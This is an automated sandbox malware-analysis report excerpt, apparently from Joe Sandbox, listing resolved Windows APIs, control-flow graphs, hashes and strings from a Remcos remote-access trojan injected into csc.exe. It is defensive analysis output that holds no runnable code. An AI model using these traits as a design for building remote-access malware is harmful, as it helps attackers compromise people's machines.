                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                      • API String ID: 4236061018-3687161714
                                                                                                                                                                                      • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                                                                                                      • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                                                                                                                                      • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 488 4432b5-4432c1 call 448cc9 491 4432e3-4432ef call 44333a ExitProcess 488->491 492 4432c3-4432d1 GetPEB 488->492 492->491 493 4432d3-4432dd GetCurrentProcess TerminateProcess 492->493 493->491
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004432EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 1703294689-263838557
                                                                                                                                                                                      • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                                                                                                                      • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                                                                                                                                      • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 48 40eef2-40ef03 call 401fd8 23->48 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03 call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 87 40ec08-40ec0a 79->87 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 90 40ec13-40ec1a 87->90 91 40ec0c-40ec0e 87->91 92 40ec1c 90->92 93 40ec1e-40ec2a call 41b2c3 90->93 96 40eef1 91->96 92->93 103 40ec33-40ec37 93->103 104 40ec2c-40ec2e 93->104 96->48 98->79 124 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->124 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39-40ec40 call 407716 103->108 104->103 129 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 130 40ec8b call 407755 107->130 121 40ec42-40ec47 call 407738 call 407260 108->121 122 40ec4c-40ec5f call 401e65 call 401fab 108->122 121->122 122->107 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 124->157 177 40ed80-40ed84 129->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 129->178 130->129 141->107 144 40ec69-40ec6f 141->144 144->107 147 40ec71 call 407260 144->147 147->107 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 202 40ed35-40ed3e call 401e65 178->202 233 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->233 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 192 40ee1e-40ee42 call 40247c call 434798 182->192 183->192 213 40ee51 192->213 214 40ee44-40ee4f call 436e90 192->214 216 40ed40-40ed7b call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 202->216 217 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 213->217 214->217 216->177 217->233 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 217->288 286 40efc1 233->286 287 40efdc-40efde 233->287 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->233 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->96 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 368 40f1cc-40f1df call 401e65 call 401fab 356->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->428 418->416 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->124 445->124 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                                                                                                                        • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                                                                                                                        • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000104), ref: 0040E9EE
                                                                                                                                                                                        • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                      • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                                      • API String ID: 2830904901-3478993377
                                                                                                                                                                                      • Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                                                                                                                                                                                      • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00404E43
                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00404E5A
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00404EA2
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00404EBA
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 00404ED1
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 2403171778-263838557
                                                                                                                                                                                      • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                                                                                                                                                                      • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                                                                                                                                      • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 465 448299-4482b0 GetLastError 466 4482b2-4482bc call 4487bc 465->466 467 4482be-4482c5 call 445af3 465->467 466->467 474 44830f-448316 SetLastError 466->474 470 4482ca-4482d0 467->470 472 4482d2 470->472 473 4482db-4482e9 call 448812 470->473 476 4482d3-4482d9 call 446782 472->476 481 4482ee-448304 call 448087 call 446782 473->481 482 4482eb-4482ec 473->482 475 448318-44831d 474->475 483 448306-44830d SetLastError 476->483 481->474 481->483 482->476 483->475
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                                                                                                                                                                      • _free.LIBCMT ref: 004482D3
                                                                                                                                                                                      • _free.LIBCMT ref: 004482FA
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00448307
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00448310
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                      • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                                                                                                                      • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 496 448566-44857a 497 448587-4485a2 LoadLibraryExW 496->497 498 44857c-448585 496->498 500 4485a4-4485ad GetLastError 497->500 501 4485cb-4485d1 497->501 499 4485de-4485e0 498->499 502 4485bc 500->502 503 4485af-4485ba LoadLibraryExW 500->503 504 4485d3-4485d4 FreeLibrary 501->504 505 4485da 501->505 506 4485be-4485c0 502->506 503->506 504->505 507 4485dc-4485dd 505->507 506->501 508 4485c2-4485c9 506->508 507->499 508->507
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                                                                                                                                      • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                      • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                                                                                                      • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                                                                                                      • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 509 40d069-40d095 call 401fab CreateMutexA GetLastError
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040D083
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                                                                                      • String ID: SG
                                                                                                                                                                                      • API String ID: 1925916568-3189917014
                                                                                                                                                                                      • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                                                                                                                      • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                                                                                                                                      • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 512 449bf0-449bf5 513 449bf7-449c0f 512->513 514 449c11-449c15 513->514 515 449c1d-449c26 513->515 514->515 516 449c17-449c1b 514->516 517 449c38 515->517 518 449c28-449c2b 515->518 519 449c98-449c9c 516->519 522 449c3a-449c47 GetStdHandle 517->522 520 449c34-449c36 518->520 521 449c2d-449c32 518->521 519->513 523 449ca2-449ca5 519->523 520->522 521->522 524 449c56 522->524 525 449c49-449c4b 522->525 527 449c58-449c5a 524->527 525->524 526 449c4d-449c54 GetFileType 525->526 526->527 528 449c5c-449c67 527->528 529 449c7a-449c8c 527->529 530 449c6f-449c72 528->530 531 449c69-449c6d 528->531 529->519 532 449c8e-449c91 529->532 530->519 533 449c74-449c78 530->533 531->519 532->519 533->519
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00449C4E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
